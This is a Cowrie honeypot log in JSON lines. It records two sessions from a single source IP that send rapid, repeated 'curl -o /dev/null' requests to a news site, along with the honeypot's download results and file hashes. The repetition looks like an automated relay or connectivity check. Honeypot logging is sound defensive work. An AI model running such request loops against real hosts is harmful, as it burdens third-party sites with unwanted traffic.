{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.612180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.629726Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.631022Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.638476Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.639902Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.665737Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.667236Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.681009Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.682474Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.686755Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.712122Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.713104Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.724440Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.726094Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.732149Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.733015Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.754070Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.755428Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.771497Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.773807Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.813577Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.815302Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.821849Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.823511Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.830158Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.831508Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.876463Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.880350Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.881678Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.887074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.888515Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.899560Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.901015Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.904583Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.950819Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.952519Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.958295Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.960076Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.998465Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.050853Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.052546Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.053867Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.059008Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.061154Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.085237Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.105879Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.125457Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.139062Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.140341Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.144298Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.145183Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.176079Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.179559Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.180718Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.183826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.184967Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.200671Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.218213Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.219893Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.222951Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.224238Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.230029Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.248428Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.264957Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.266405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.270453Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.272039Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.284564Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.304781Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.326050Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.353156Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.355523Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.372892Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.374511Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.377770Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.379051Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.396289Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.397924Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.426282Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.427843Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.434430Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.435825Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.437121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.468658Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.469998Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.472829Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.473731Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.476105Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.479309Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.510909Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.512400Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.515713Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.516927Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.548925Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.551096Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.552211Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.555549Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.558404Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.560002Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.616926Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.619054Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.688318Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.690503Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.712234Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.713761Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.716811Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.718092Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.750927Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.752270Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.768021Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.770311Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.772870Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.775066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.795881Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.798624Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.811977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.813004Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.815218Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.816388Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.832035Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.834216Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.850032Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.851579Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
